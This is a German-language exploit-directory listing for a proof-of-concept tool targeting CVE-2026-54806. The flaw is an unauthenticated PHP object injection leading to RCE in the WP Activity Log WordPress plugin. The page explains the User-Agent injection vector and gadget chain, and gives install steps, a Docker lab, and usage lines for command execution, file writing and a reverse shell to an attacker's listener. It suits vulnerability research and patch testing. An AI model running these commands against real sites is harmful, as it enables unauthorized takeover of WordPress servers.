Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-54806 — Unauthentifizierte PHP Object Injection zu RCE in WP Activity Log <= 5.6.3.1 (CVE-2026-54806) | Kitploit
Tools/GitHubGitHub/joshuavanderpoll/cve-2026-54806
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-ToolPayload-EntwicklungLabs & Praxis
GitHubjoshuavanderpoll/cve-2026-54806

CVE-2026-54806

Unauthentifizierte PHP Object Injection zu RCE in WP Activity Log <= 5.6.3.1 (CVE-2026-54806)

Repository anzeigen
54vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WP Activity Log PHP Object Injection (CVE-2026-54806) PoC

Python

📜 Beschreibung

CVE-2026-54806 ist eine kritische (CVSS 9.8) nicht authentifizierte PHP-Objekt-Injection-Schwachstelle im WP Activity Log WordPress Plugin (wp-security-audit-log) von Melapress. Ein nicht authentifizierter Angreifer kann serialisierte PHP-Objekte über den User-Agent-Header bei jeder Anforderung injizieren, die ein protokolliertes Ereignis auslöst (z. B. einen fehlgeschlagenen Login). Die injizierte Payload wird in der Datenbank gespeichert und ohne Einschränkungen deserialisiert, wenn ein Administrator das WordPress-Dashboard besucht, was zu einer blinden Remote-Code-Ausführung führt (keine Ausgabe an den Angreifer).

Betroffenes Plugin: WP Activity Log <= 5.6.3.1 (behoben in 5.6.4)

Erforderlich für RCE: WordPress 6.4.0 - 6.4.1 — dieses PoC verwendet das WP_HTML_Token-Gadget, die einzige WP-Kernkette mit ausschließlich öffentlichen Eigenschaften, die sanitize_text_field() übersteht und das 255-Zeichen-Spaltenlimit einhält.

✨ Funktionen

  • Schwachstellenprüfung — Zerstörungsfreie Erkennung mittels --check
  • Befehlsausführung — Befehle injizieren mittels --command
  • Reverse Shell — Reverse Shell injizieren mittels --shell
  • Datei schreiben — Dateien schreiben mittels --write-file
  • Keine Authentifizierung erforderlich — Payload wird über den User-Agent eines fehlgeschlagenen Logins injiziert
  • Blindes RCE — Keine Befehlsausgabe; für Interaktion Reverse Shell oder Datei schreiben verwenden

🛠️ Installation

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Verwendung

root@kitploit:~
python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
python3 cve-2026-54806.py -t <target> --write-file <content> <path>

🐋 Docker PoC

In sich geschlossenes Labor mit WordPress 6.4.1 + WP Activity Log 5.6.3.1. Details finden Sie in DOCKER.md.

root@kitploit:~
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check

Das Labor enthält einen admin-bot, der alle 60s das Dashboard besucht, sodass injizierte Payloads automatisch ausgelöst werden — kein manuelles Eingreifen erforderlich.

🕵🏼 Referenzen

  • WP Activity Log — Melapress
  • NVD — CVE-2026-54806
  • Patchstack — CVE-2026-54806

📢 Haftungsausschluss

Dieses Tool wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Der Ersteller übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Tool herunterladen